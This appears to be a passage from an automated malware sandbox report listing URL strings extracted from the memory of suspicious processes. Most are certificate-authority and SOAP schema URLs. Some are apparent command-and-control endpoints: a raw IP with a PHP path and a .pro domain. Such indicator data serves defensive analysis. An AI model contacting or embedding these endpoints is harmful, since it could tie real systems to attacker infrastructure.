Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 0000001D.00000002.2707762608.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php:
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpG
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpQ:Fl
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpb
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpc:xl
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpl
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpn
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phprowser
Source: svchost015.exe, 0000001D.00000002.2609194707.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phption:
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpz
Source: svchost015.exe, 0000001D.00000002.2707762608.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158;
Source: svchost015.exe, 0000001D.00000002.2609194707.00000000005AD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://91.202.233.158JJEB
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
Source: acentric.exe, 0000001B.00000002.3279256939.00000000028EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://conditionprovice.pro
Source: acentric.exe, 0000001B.00000002.3279256939.00000000028EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://conditionprovice.prod
Source: axplong.exe, 00000009.00000003.2542556757.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3837178625.0000000005D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: axplong.exe, 00000009.00000003.2542556757.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3837178625.0000000005D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: axplong.exe, 00000009.00000003.2542556757.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3837178625.0000000005D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: axplong.exe, 00000009.00000003.2542556757.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3837178625.0000000005D0F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: splwow64.exe, 00000021.00000002.2292845990.0000000000408000.00000002.00000001.01000000.00000021.sdmp, splwow64.exe, 00000021.00000000.2277147074.0000000000408000.00000002.00000001.01000000.00000021.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: axplong.exe, 00000009.00000003.2542556757.0000000005D18000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3837178625.0000000005D0F000.00000004.00000020.00020000.00000000.sdmp, needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: needmoney.exe, 00000017.00000002.2248416427.0000000002E50000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: RegAsm.exe, 0000000C.00000002.2220091098.0000000002D08000.00000004.00000800.00020000.00000000.sdmp, u3uP67496d.exe, 00000012.00000002.2272318909.0000000002E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
